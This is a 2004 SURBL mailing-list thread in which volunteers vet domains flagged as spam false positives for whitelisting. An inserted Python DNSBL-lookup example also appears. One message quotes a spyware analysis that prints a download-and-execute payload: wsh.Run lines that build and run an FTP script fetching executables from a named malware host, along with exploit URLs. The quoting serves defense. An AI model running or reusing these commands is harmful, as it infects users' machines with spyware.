Theo got us a list of 112 new false positives from across all SURBLs. He showed me the source messages which are almost all subscribed newsletters and mailing list messages, so they seem quite hammy.
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
123inkjets.com 1and1.com 1sound.com 4d.com 65.17.207.40 69.50.139.61 8k.com aaronsw.com achtungachtung.com activatormail.com addictivetechnologies.net aec.at agnitum.com aladdinsys.com amnesty-volunteer.org ampcast.com apple.ru atstake.com barebones.com bbspot.com bis1bp.com bridgingthegapforhealthcare.org classesusa.com clearcredit.com commonwealthclub.org conceptdraw.com crime-research.org ctsg.com default-homepage-network.com design-tools.com dontspyon.us drbott.com drivesavers.com drorshalev.com duckland.org ecsirt.net faithfulamerica.org fetchsoftworks.com fipr.org firearmsandliberty.com firepaige.org firewiredirect.com flingstone.com forest.net geoffmetcalf.com globat.com gotomypc.com guninski.com hasbrouck.org hiramoto.org hnc3k.com imgfarm.com imrsvcs.com inderjeetsodhi.com joegratz.net karelia.com lacie.com lacipeterson.com m-w.com macsales.com mail15.com maliasoft.com moveon.org mutemail.com mysurvey.com navi.cx news-miner.com ourfuture.org oxsemi.com passthison.com pcpitstop.com pivx.com pivxlabs.com popmoney.net port5.com postarmor.com prosoftengineering.com qwik-fix.net ravantivirus.com redhawk.org redlers.com reunion.com safecenter.net salary.com saturnevents.com secnetops.biz secnetops.com seti.org smalldog.com snopes.com soundclick.com spywareinfo.com tex-edit.com the-livingstons.org tidbits.com tu-cottbus.de ukclimbing.com umbrella.name uophx.edu uoregon.edu userfriendly.org vechtwijk.nl virtual.net virusall.com westdam.com wiebetech.com wireless-starter-kit.com wlug.org worldwidemart.com wpi.edu wsacorp.com yale.edu
Jeff C.
Correction: not all of those are necessarily FPs, but all had appeared in messages that had some FPs. In other words some are FPs and some are not. All come from ham, so we should probably whitelist them all, but checking would be appreciated.
Can we divide these up to check?
Jeff C.
Jeff Chan writes:
Correction: not all of those are necessarily FPs, but all had appeared in messages that had some FPs. In other words some are FPs and some are not. All come from ham, so we should probably whitelist them all, but checking would be appreciated.
fwiw, aaronsw.com is white-hat -- it's Aaron Swartz' personal domain, and is used (afaik) for person-to-person mail only -- specifically, Aaron-to-person. ;)
if that's listed, it's definitely an FP. Aaron is not a spammer. ;)
- --j.
On Monday, September 6, 2004, 9:10:22 PM, Justin Mason wrote:
Jeff Chan writes:
Correction: not all of those are necessarily FPs, but all had appeared in messages that had some FPs. In other words some are FPs and some are not. All come from ham, so we should probably whitelist them all, but checking would be appreciated.
fwiw, aaronsw.com is white-hat -- it's Aaron Swartz' personal domain, and is used (afaik) for person-to-person mail only -- specifically, Aaron-to-person. ;)
if that's listed, it's definitely an FP. Aaron is not a spammer. ;)
That's one that's not on any lists. Probably it was in one of Theo's hams that had a different FP hit in the same message.
Jeff C.
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
I can do S - Z if that's of help?
Regards,
Joseph
safecenter.net salary.com saturnevents.com secnetops.biz secnetops.com seti.org smalldog.com snopes.com soundclick.com spywareinfo.com tex-edit.com the-livingstons.org tidbits.com tu-cottbus.de ukclimbing.com umbrella.name uophx.edu uoregon.edu userfriendly.org vechtwijk.nl virtual.net virusall.com westdam.com wiebetech.com wireless-starter-kit.com wlug.org worldwidemart.com wpi.edu wsacorp.com yale.edu
On Monday, September 6, 2004, 9:03:33 PM, Joseph Burford wrote:
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
I can do S - Z if that's of help?
Regards,
Joseph
Thanks, we could definitely use the help. Ryan would you like to split the remainder with me?
FWIW there were another 65 or so domains I extracted from Theo's hams that I did not include in that FP list because they were already in whitelists. In other words they probably would have been non-hits, unless they were whitelisted recently.
Jeff C.
Jeff Chan wrote to SURBL Discussion list:
On Monday, September 6, 2004, 9:03:33 PM, Joseph Burford wrote:
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
I can do S - Z if that's of help?
Regards, Joseph
Thanks, we could definitely use the help. Ryan would you like to split the remainder with me?
Sure.
http://ry.ca/geturi/1-f.html <-- I'll take these
http://ry.ca/geturi/g-r.html <-- Jeff?
http://ry.ca/geturi/s-z.html <-- Joseph
- Ryan
http://ry.ca/geturi/s-z.html <-- Joseph
Mine's got them all :|
No worries on that, will get started shortly.
Regards,
Joseph
On Monday, September 6, 2004, 9:37:21 PM, Ryan Thompson wrote:
http://ry.ca/geturi/1-f.html <-- I'll take these
http://ry.ca/geturi/g-r.html <-- Jeff?
http://ry.ca/geturi/s-z.html <-- Joseph
- Ryan
Sounds good. I've got g through r Thanks!
Jeff C.
All domains in "g through r" except quik-fix.com are two or more years old. Several are nearly 10 years old. The computer security hits probably came from a security newsletter. The political sites came from political newsletter(s), all subscribed. There also appears to be an Apple/Macintosh mailing list.
geoffmetcalf.com - political commentary
globat.com - web host, probably gets abused, but mostly legit
gotomypc.com - legit remote PC operation software
guninski.com - computer security site
hasbrouck.org - author "The Practical Nomad", unlikely pro spammer
hiramoto.org - Hiramoto Family Website
hnc3k.com - hacking and cracking, arguably legit security interest
imgfarm.com - iwon.com, akamai hosting, a bit grey, probably legit
imrsvcs.com - Electronic Data Systems Corporation, huge IT company
inderjeetsodhi.com - personal web site of IT consultant
joegratz.net - personal site of law student, unlikely spam site
karelia.com - Mac software company
lacie.com - major manufacturer of hard, cd, dvd drives
lacipeterson.com - crime victim personal site
m-w.com - 150+ year old dictionary company
macsales.com - apple computer shop
mail15.com - site of "trappers", a bugtraq security contributor
maliasoft.com - antispam software
moveon.org - political
mutemail.com - Secure Anonymous Email Services, probably legit
mysurvey.com - survey site, 60 year old company, unlikely major spammers
navi.cx - makes system for tracking open-source projects
news-miner.com - newspaper in Alaska, probably not major spammers
ourfuture.org - political
oxsemi.com - Oxford Semiconductor - Chips for MPEG, Firewire...
passthison.com ============= removed from list, spyware destination
pcpitstop.com - pc tuneup, virus, spyware, adware awareness
pivx.com - computer security company
pivxlabs.com - computer security company
popmoney.net =============== removed from list, spyware destination
port5.com - free web hosting, open proxy list security list mention
postarmor.com - antispam software
prosoftengineering.com - Netware Mac client for OS 10
qwik-fix.net - computer security company
ravantivirus.com - antivirus company
redhawk.org - open source software project
redlers.com - word processor for Mac OS X
reunion.com - people finder site, probably abused, mostly legit
In summary, all are mostly legitimate, and so are the ones Ryan and Joseph researched. Therefore I am whitelisting all of the SURBL-wide FPs we got from Theo, minus the ones I deleted from that spyware message. The resulting list, plus some already whitelisted like apple.com and google.com, etc. is at:
http://spamcheck.freeapp.net/whitelists/theo-set1.sort
If anyone has any objections or spots any obvious major spammers, please let us know.
Thanks for the help, Theo, Joseph, Ryan and others.
Jeff C.
OK. Here are my recommendations on the 1-f bunch, assuming these did hit real ham. Descriptions preceded by FP indicate domains that are listed in multi.surbl.org (in the FP list generated by geturi). I don't think I missed any.
123inkjets.com 158 NANAS reports that look spammy as hell, but they've been around for years. Good greylist candidate?
1and1.com 1and1 Internet. Most NANAS reports are just nameserver hits. Definitely legit users.
1sound.com Can't resolve domain, but no real NANAS hits, and has been registered for 4+ years. Domain servers appear to be unresponsive.
4d.com Registered in '93, CAD software package
8k.com FP: Free web space
aaronsw.com JM knows
activatormail.com FP: Looks white-hat to me; 4+ years of email service, looks like users sometimes spam. Should not be listed in SURBL.
agnitum.com FP: 4+ years; make firewall software. NANAS hits look bogus. No way this should be listed in SURBL.
aladdinsys.com On the net since '94; they make compression software
amnesty-volunteer.org The domain is 2517 days old, and looks like the site isn't much younger. :-) More importantly, no NANAS hits, and they look rather legit.
ampcast.com atstake.com barebones.com commonwealthclub.org conceptdraw.com crime-research.org ctsg.com design-tools.com drbott.com drivesavers.com These all look legit to me, no damning NANAS reports, and domains registered for > 2 years. I couldn't find any evidence of spam for any of them.
bbspot.com FP: One of my favourite sites. :-) More importantly, they don't spam. Whitelist.
classesusa.com One NANAS example, possibly forged. Maybe not whitelist. Registered for 4+ years.
clearcredit.com FP: Many NANAS examples, but all are over a year old. The site has a new owner as of March 2004. I'd say de-list and see what happens.
drorshalev.com Looks like a personal site, and it's been registered since last year and I couldn't find any evidence of spamming.
duckland.com Personal site, no NANAS, around for years
ecsirt.net Doesn't resolve; no nameservers. Also, no NANAS. Reg'd in 2002
fetchsoftworks.com Looks legit enough to me
fipr.org Old and well-known organization; no history of spam
firewiredirect.com One NANAS hit that was probably someone who forgot they subscribed to the newsletter. :-)
forest.net Hosting and co-location. Definitely legit.
So, to summarize, all of these should at *least* be de-listed, and, with a few exceptions, they're all potential whitelist candidates.
- Ryan
Jeff Chan wrote to SURBL Discussion list:
On Monday, September 6, 2004, 9:03:33 PM, Joseph Burford wrote:
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
I can do S - Z if that's of help?
Regards,
Joseph
Thanks, we could definitely use the help. Ryan would you like to split the remainder with me?
FWIW there were another 65 or so domains I extracted from Theo's hams that I did not include in that FP list because they were already in whitelists. In other words they probably would have been non-hits, unless they were whitelisted recently.
Jeff C.
Discuss mailing list Discuss@lists.surbl.org http://lists.surbl.org/mailman/listinfo/discuss
Ryan Thompson wrote to SURBL Discussion list:
I don't think I missed any.
Ha! *somebody* needs a nap. I only forgot to look at the first third of my list or so. :-)
bis1bp.com FP: Hmm... Domain doesn't resolve thanks to there not being any authoritative nameservers. It's 87 days old. If this was really found in ham, I'd say de-list.
aec.at Looks legit
apple.ru Apple division in Russia
bridgingthegapforhealthcare.org FP: Aside from winning the Longest Domain in the List Contest, I don't see any evidence of spam.
faithfulamerica.org Couldn't find any evidence of spam
firepaige.org FP: Political campaign site. Any spam they send would be kind of iffy to begin with, and the only NANAS example wasn't even directly related to them.
addictivetechnologies.net
achtungachtung.com I need help with this one. "Our state of the art software delivers targeted advertising to millions of web users based on geography, language, time, etc..."
default-homepage-network.com Heh. "Due to new laws being enacted and controversy surrounding our business model, we have voluntarily decided to implement the cease of all current business practices by the end of June 2004."
firearmsandliberty.com dontspyon.us Couldn't find any spam reports, but they're more US political sites.
flingstone.com "XML search feed provider". No NANAS reports.
- Ryan
My bad, I inadvertently included a message which was about trojan-like spyware, which is publicly available at:
http://seclists.org/lists/bugtraq/2004/May/0153.html
http://65.17.207.40/framepb_1u.php
which redirects to
http://si1.default-homepage-network.com/180/180.htm?si-001
which redirects to
http://object.passthison.com/vu083003/object.cgi?si1
which uses the Object Data vulnerability to change your startpage to
http://default-homepage-network.com/start.cgi?hkcu
the parameter at the end is either HKCU or HKLM depending on which registry branch led you there. This serves to notify default-homepage-network whether your machine has been compromised with user or administrator privileges
start.cgi also opens a few popup windows with advertisements, after which it opens the following page
http://default-homepage-network.com/newspynotice.html
that wants to sell you a cure against spyware which hijacks your start page - as theirs just did.
That page also secretly opens
http://object.passthison.com/vu083003/newobject1.cgi
http://69.50.139.61/hp1/hp1.htm
http://www.achtungachtung.com/0021/index.php
newobject1.cgi executes the following commands through the Windows Script Host object:
wsh.Run('command /C echo open downloads.default-homepage-network.com>o',false,6);
wsh.Run('command /C echo tmpacct>>o',false,6);
wsh.Run('command /C echo 12345>>o',false,6);
wsh.Run('command /C echo bin>>o',false,6);
wsh.Run('command /C echo get install2.exe>>o',false,6);
wsh.Run('command /C echo get infamous_downloader.exe>>o',false,6);
wsh.Run('command /C echo get 0021-bdl94126.EXE>>o',false,6);
wsh.Run('command /C echo get CS4P028.exe>>o',false,6);
wsh.Run('command /C echo bye>>o',false,6);
wsh.Run('command /C echo if not exist %windir%\statuslog ftp -s:o >>o.bat',false,6);
wsh.Run('command /C echo if exist install2.exe install2.exe >>o.bat',false,6);
wsh.Run('command /C echo if exist infamous_downloader.exe infamous_downloader.exe >>o.bat',false,6);
wsh.Run('command /C echo if exist 0021-bdl94126.EXE 0021-bdl94126.EXE >>o.bat',false,6);
wsh.Run('command /C echo if exist CS4P028.exe CS4P028.exe >>o.bat',false,6);
wsh.Run('command /C o.bat',false,6);
Hp1.htm tries to exploit the Ibiza MHTML/CHM vulnerability to launch http://69.50.139.61/hp1/HP1.chm::/hp1.htm
framepb_1u.php also tries to open http://69.50.139.61/hp2/hp2.htm which uses Ibiza to launch http://69.50.139.61/hp2/hp2.chm::/hp2.htm
Other files that are attempted to be delivered are
http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab
http://www.addictivetechnologies.net/DM0/exe/emCraft1.exe
http://validation-required.info/
http://www.popmoney.net/ip/index.php
http://www.portalone.hostance.com.com/italia.exe
Therefore I am taking all those domains out of the possible whitelist.
Jeff C.
On Monday, September 6, 2004, 11:36:28 PM, Jeff Chan wrote:
My bad, I inadvertently included a message which was about trojan-like spyware, which is publicly available at:
sigh, sending all those bad guy domains appears to have caused messages to some subscribers of this list to bounce, and mailman to remove them because of it... :-(
Jeff C.
On Monday, September 6, 2004, 11:10:50 PM, Ryan Thompson wrote:
bis1bp.com FP: Hmm... Domain doesn't resolve thanks to their not being any authoritative nameservers. It's 87 days old. If this was really found in ham, I'd say de-list.
I found this one in the original message and it's part of a security mailing list mention of a phishing site. Removing from whitelist.
http://seclists.org/lists/bugtraq/2004/Jun/0268.html
It no longer resolves but should be fine to block on IMO.
Jeff C.
Jeff Chan wrote to SURBL Discuss:
Theo got us a list of 112 new false positives from across all SURBLs. He showed me the source messages which are almost all subscribed newsletters and mailing list messages, so they seem quite hammy.
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
Maybe this will help:
http://ry.ca/geturi/20040906-fp.html
Also, I'll check a few and post my suggestions.
- Ryan
Ryan Thompson wrote to SURBL Discussion list:
Jeff Chan wrote to SURBL Discuss:
Theo got us a list of 112 new false positives from across all SURBLs. He showed me the source messages which are almost all subscribed newsletters and mailing list messages, so they seem quite hammy.
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
Maybe this will help:
http://ry.ca/geturi/20040906-fp.html
Also, I'll check a few and post my suggestions.
First-pass no-brainers:
m-w.com bbspot.com userfriendly.org seti.org 8k.com 4d.com wpi.edu yale.edu uoregon.edu uophx.edu
(is there any reason why .edu domains should *ever* be listed in SURBL? Should we whitelist the whole of .edu?)
- Ryan
On Monday, September 6, 2004, 9:20:23 PM, Ryan Thompson wrote:
Ryan Thompson wrote to SURBL Discussion list:
Jeff Chan wrote to SURBL Discuss: Maybe this will help:
http://ry.ca/geturi/20040906-fp.html
Also, I'll check a few and post my suggestions.
First-pass no-brainers:
m-w.com bbspot.com userfriendly.org seti.org 8k.com 4d.com wpi.edu yale.edu uoregon.edu uophx.edu
(is there any reason why .edu domains should *ever* be listed in SURBL? Should we whitelist the whole of .edu?)
- Ryan
Thanks.
Regarding .edu I don't think we can give any TLD a free pass, except maybe things like .gov, .mil, or other similarly strictly-controlled domains.
Some folks felt that kaplan.edu spammed them, but given the potential for legitimate use and therefore collateral damage from false positives, we really can't list it.
Jeff C.
On Monday, September 6, 2004, 9:31:31 PM, Jeff Chan wrote:
Regarding .edu I don't think we can give any TLD a free pass, except maybe things like .gov, .mil, or other similarly strictly-controlled domains.
But instead of whitelisting an entire TLD we can try to let the data speak for itself. There are very few spam reports on those TLDs, so in a sense it takes care of itself.
Jeff C.
On Mon, 6 Sep 2004, Jeff Chan wrote:
Regarding .edu I don't think we can give any TLD a free pass, except maybe things like .gov, .mil, or other similarly strictly-controlled domains.
Some folks felt that kaplan.edu spammed them, but given the potential for legitimate use and therefore collateral damage from false positives, we really can't list it.
Jeff C.
More to the point, Kaplan College hired a spamhaus (ie-express.com) (SBL #SBL15843) to do a spam campaign for them.
One of my spamtraps collected multiple hits from them. (The target address was only used in a 'mailto:' on a web page, spiders harvested it).
I was particularly amused by the rationalization paragraph in that message:
You have received this advertisement because you signed up to receive offers from ie-express.com and/or through one of our affiliate partners. You signed up at 10/08/03 14:26:54 on 216.116.242.73 with the following IP address 5106541715. Any correspondence about the products/services advertised should be directed to the company in the ad. Our privacy policy can be found here: http://ie-express.com/fa_privacypolicy.php
(full spam example available upon request ;)
Kaplan College -is- a legit business, but if they can resort to hiring spammers with impunity they will only add to the spam problem. (It is an economic issue, as long as spammers can do their 'biziness' with little cost and make money they will only increase).
Looks good. Did not see the heuristic details documented, but one thing I would definitely suggest adding is spamhaus lookups on the resolved www and base domain and on the domain NS records. I find that a strong correlator of spam, though of course no source is perfect. For example:
antispam: [198]% ns savingzplus.biz
Server: localhost.freeapp.net
Address: 127.0.0.1

Name: savingzplus.biz
Address: 219.147.198.131

antispam: [199]% ns www.savingzplus.biz
Server: localhost.freeapp.net
Address: 127.0.0.1

Name: www.savingzplus.biz
Address: 219.147.198.131
(where ns is nslookup)
antispam: [202]% dig 131.198.147.219.sbl-xbl.spamhaus.org a
; <<>> DiG 8.3 <<>> 131.198.147.219.sbl-xbl.spamhaus.org a
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20797
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 13, ADDITIONAL: 14
;; QUERY SECTION:
;; 131.198.147.219.sbl-xbl.spamhaus.org, type = A, class = IN

;; ANSWER SECTION:
131.198.147.219.sbl-xbl.spamhaus.org. 1h59m53s IN A 127.0.0.2
Bingo! Probably a bad guy.
Jeff C.
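The check Jeff sketches above (resolve the base domain, the www host and the NS hosts, reverse each IP's octets, and query the result under the sbl-xbl.spamhaus.org zone, treating any 127.0.0.x answer as a hit) as an added example; this is not code from the SURBL project or from the thread. The resolver is injected so the module runs offline against a constructed answer table: the savingzplus.biz addresses are the ones shown in the nslookup/dig output above, while the nameserver name ns1.example.net, its address 203.0.113.9 and the example.org entries are made up for the demonstration. To query live DNS you would pass a resolver function that wraps a real library such as dnspython.

```python
"""DNSBL lookup heuristic, modelled on the sbl-xbl check in the message above.

Added example, not SURBL's own code. The resolver is a pluggable callable
(name, rrtype) -> list of rdata strings that raises LookupError on NXDOMAIN,
so the whole module runs offline against the constructed FAKE_ZONE below.
"""
import ipaddress
from typing import Callable, Dict, List, Tuple

Resolver = Callable[[str, str], List[str]]

DEFAULT_ZONE = "sbl-xbl.spamhaus.org"
# DNSBLs answer with an address in 127.0.0.0/8; 127.0.0.2 is the SBL code
# shown in the dig output above.
LISTED_PREFIX = "127.0.0."


def dnsbl_query_name(ip: str, zone: str = DEFAULT_ZONE) -> str:
    """219.147.198.131 -> 131.198.147.219.sbl-xbl.spamhaus.org (octets reversed).

    ipaddress validates the input so a hostname or garbage never reaches DNS.
    """
    addr = ipaddress.IPv4Address(ip)
    reversed_octets = ".".join(reversed(str(addr).split(".")))
    return f"{reversed_octets}.{zone}"


def is_listed(ip: str, zone: str, resolve: Resolver) -> bool:
    """True when the DNSBL returns a 127.0.0.x answer; NXDOMAIN means not listed."""
    try:
        answers = resolve(dnsbl_query_name(ip, zone), "A")
    except LookupError:
        return False
    return any(a.startswith(LISTED_PREFIX) for a in answers)


def check_domain(domain: str, resolve: Resolver,
                 zone: str = DEFAULT_ZONE) -> Dict[Tuple[str, str], bool]:
    """Apply the heuristic from the message: look at the A records of the base
    domain, of www.<domain>, and of every NS host, and test each IP against the
    DNSBL. Returns {(host, ip): listed?} so the caller can see which hit fired."""
    hosts = {domain, "www." + domain}
    try:
        for ns in resolve(domain, "NS"):
            hosts.add(ns.rstrip("."))
    except LookupError:
        pass  # no NS answer: still check the base and www hosts
    hits: Dict[Tuple[str, str], bool] = {}
    for host in sorted(hosts):
        try:
            ips = resolve(host, "A")
        except LookupError:
            continue  # unresolvable host contributes nothing
        for ip in ips:
            hits[(host, ip)] = is_listed(ip, zone, resolve)
    return hits


# Constructed offline answer table (assumption: ns1.example.net / 203.0.113.9
# and the example.org records are invented; the savingzplus.biz entries mirror
# the nslookup/dig output quoted in the thread).
FAKE_ZONE: Dict[Tuple[str, str], List[str]] = {
    ("savingzplus.biz", "A"): ["219.147.198.131"],
    ("www.savingzplus.biz", "A"): ["219.147.198.131"],
    ("savingzplus.biz", "NS"): ["ns1.example.net."],
    ("ns1.example.net", "A"): ["203.0.113.9"],
    ("131.198.147.219.sbl-xbl.spamhaus.org", "A"): ["127.0.0.2"],
    ("example.org", "A"): ["192.0.2.10"],
    ("www.example.org", "A"): ["192.0.2.10"],
}


def fake_resolve(name: str, rrtype: str) -> List[str]:
    """Stand-in resolver: anything not in FAKE_ZONE behaves like NXDOMAIN."""
    try:
        return FAKE_ZONE[(name, rrtype)]
    except KeyError:
        raise LookupError(f"NXDOMAIN {name} {rrtype}")


def verdict(domain: str, resolve: Resolver = fake_resolve) -> str:
    """One-line summary suitable for a whitelist review pass."""
    hits = check_domain(domain, resolve)
    bad = [f"{host} ({ip})" for (host, ip), listed in hits.items() if listed]
    return "suspect: " + ", ".join(bad) if bad else "no DNSBL hits"


if __name__ == "__main__":
    for d in ("savingzplus.biz", "example.org"):
        print(d, "->", verdict(d))
```

As the message notes, a DNSBL hit on the hosting or nameserver IP is a correlator, not proof: shared hosting and large registrars put legitimate domains behind listed addresses, which is why the function reports which host and IP matched rather than collapsing to a single yes/no.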
On Mon, Sep 06, 2004 at 08:43:10PM -0700, Jeff Chan wrote:
Theo got us a list of 112 new false positives from across all SURBLs. He showed me the source messages which are almost all subscribed newsletters and mailing list messages, so they seem quite hammy.
Heh. I can't wait to see what my full corpus shows (I think the last list I sent over was most of the ham messages). ;)
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
I'll leave that up to you folks, but here's my thoughts.
For most of the listed domains, I have no idea who they are. The ones I recognize off-hand are below, FWIW.
amnesty-volunteer.org atstake.com barebones.com drbott.com duckland.org firepaige.org lacie.com m-w.com macsales.com moveon.org ourfuture.org oxsemi.com reunion.com salary.com saturnevents.com seti.org smalldog.com snopes.com tidbits.com userfriendly.org wlug.org wpi.edu yale.edu
Jeff,
I think I got them all.
safecenter.net - LEGIT Created on: 07-SEP-02 Home security site. NANAS 0
salary.com - LEGIT created on 31-Dec-1995 The NANAS hits seem to be mainly for spammers mentioning them in spam. There is a couple of spams from 02 which have mail2.salary.com as the relay, however it doesn't lookup to that IP now, if indeed it ever did. NANAS 20
saturnevents.com - LEGIT Created on 2000-May-08 Registered to General Motors NANAS 0
secnetops.com - LEGIT Created on: 04-FEB-03 Security services & products NANAS 0
seti.org - LEGIT Created On:31-Oct-1995 The SETI Institute, been around a long time. NANAS 0
smalldog.com - LEGIT created on 06-Mar-1998 Apple retailer/online shop. They appear to have advertised in some newsletters that may have been spam. Also appear in the tidbits.com (domain below) newsletter. NANAS 3
snopes.com - LEGIT created on 09-Jan-1997 One of the first internet urban legends pages, everybody knows them. Other than the yuck popups and 10000 smiley faces they are legit. NANAS 122
soundclick.com - LEGIT created on 13-Aug-1997 Music site - has a few spammy type popups. The only nanas report would suggest that a band or user of their service sent a spam promoting their Band. NANAS 1
spywareinfo.com - LEGIT Created on: 25-Oct-01 Looking around it appears to be a legit site, website is down from here at the moment, can't check any more. NANAS 4
tex-edit.com - LEGIT created on April 08, 2001 Scripts and stuff for MACs NANAS 0
the-livingstons.org - LEGIT Created On:06-Jan-2003 Someone's personal website NANAS 0
tidbits.com - LEGIT created on 04-May-1992 MAC newsletter type place. NANAS 7
ukclimbing.com - LEGIT created on 03-Sep-1998 A climbing website funny enough :-) NANAS 0
uophx.edu - LEGIT
uoregon.edu - LEGIT
userfriendly.org Created on 04-Aug-1998 Geek cartoon, like who doesn't subscribe to this?? :P NANAS 3
virusall.com - LEGIT Created on 14 Dec 2001 Information about viruses & hoaxes NANAS 0
westdam.com - LEGIT Created on: 03-Jan-02 Offer various free internet services NANAS 0
wiebetech.com - LEGIT Created on 11-Jul-2000 Hosted by Yahoo Storage solutions NANAS 0
wireless-starter-kit.com - LEGIT Created on 21-Oct-2002 Wireless networking book NANAS 0
wlug.org - LEGIT Created On:30-Nov-1999 Worcester Linux Users Group NANAS 0
worldwidemart.com - LEGIT Creation date: 28 Jul 1995 Used to be Matts script archive, now at www.scriptarchive.com Matt had a popular formmail script full of holes, that's possibly why it appears in a fair few NANAS hits. Now the domain is used by a webhoster. NANAS 49
wpi.edu - LEGIT
wsacorp.com - LEGIT Created on: 26-Jun-03 Career Marketers - Partners with Wall Street Journal and more Their legit domain has been listed in spams, ie. our spam service is as good as these guys... NANAS 2
yale.edu - LEGIT
Theo got us a list of 112 new false positives from across all SURBLs. He showed me the source messages which are almost all subscribed newsletters and mailing list messages, so they seem quite hammy.
Hi Jeff!
mysurvey.com:
I received spam from listmaster@theemailer.com advertising mysurvey.com and frus-onket.com on May 19, 2004 and listed the domains. However, just checking now some people seem to subscribe to mysurvey.com. Another one for the greylist...
achtungachtung.com:
This site is listed on many websites as hosting components of spyware. Trojan "Troj/Achtung-A" downloads a file from their site. I don't know if the site is mentioned in any spam.
The following are on my local whitelist:
1and1.com mail15.com moveon.org yale.edu
Joe
Given the type of source messages and some spot checking, I'm inclined to whitelist them all, but I'd like to ask for some help checking them first. Can anyone help check these?
123inkjets.com 1and1.com 1sound.com 4d.com 65.17.207.40 69.50.139.61 8k.com aaronsw.com activatormail.com addictivetechnologies.net aec.at agnitum.com aladdinsys.com amnesty-volunteer.org ampcast.com apple.ru atstake.com barebones.com bbspot.com bis1bp.com bridgingthegapforhealthcare.org classesusa.com clearcredit.com commonwealthclub.org conceptdraw.com crime-research.org ctsg.com default-homepage-network.com design-tools.com dontspyon.us drbott.com drivesavers.com drorshalev.com duckland.org ecsirt.net faithfulamerica.org fetchsoftworks.com fipr.org firearmsandliberty.com firepaige.org firewiredirect.com flingstone.com forest.net geoffmetcalf.com globat.com gotomypc.com guninski.com hasbrouck.org hiramoto.org hnc3k.com imgfarm.com imrsvcs.com inderjeetsodhi.com joegratz.net karelia.com lacie.com lacipeterson.com m-w.com macsales.com mail15.com maliasoft.com moveon.org mutemail.com mysurvey.com navi.cx news-miner.com ourfuture.org oxsemi.com passthison.com pcpitstop.com pivx.com pivxlabs.com popmoney.net port5.com postarmor.com prosoftengineering.com qwik-fix.net ravantivirus.com redhawk.org redlers.com reunion.com safecenter.net salary.com saturnevents.com secnetops.biz secnetops.com seti.org smalldog.com snopes.com soundclick.com spywareinfo.com tex-edit.com the-livingstons.org tidbits.com tu-cottbus.de ukclimbing.com umbrella.name uophx.edu uoregon.edu userfriendly.org vechtwijk.nl virtual.net virusall.com westdam.com wiebetech.com wireless-starter-kit.com wlug.org worldwidemart.com wpi.edu wsacorp.com yale.edu
Jeff C.
Jeff Chan mailto:jeffc@surbl.org http://www.surbl.org/
On Tuesday, September 7, 2004, 12:21:59 AM, Joe Wein wrote:
Theo got us a list of 112 new false positives from across all SURBLs. He showed me the source messages which are almost all subscribed newsletters and mailing list messages, so they seem quite hammy.
Hi Jeff!
mysurvey.com:
I received spam from listmaster@theemailer.com advertising mysurvey.com and frus-onket.com on May 19, 2004 and listed the domains. However, just checking now some people seem to subscribe to mysurvey.com. Another one for the greylist...
achtungachtung.com:
This site is listed on many websites as hosting components of spyware. Trojan "Troj/Achtung-A" downloads a file from their site. I don't know if the site is mentioned in any spam.
The following are on my local whitelist:
1and1.com mail15.com moveon.org yale.edu
Joe
Thanks much Joe. I excluded some domains that were mentioned in a spyware message. auchtung.... was one of them.
Appreciate the feedback about the others. Was trying to figure out mail15.com....
Jeff C.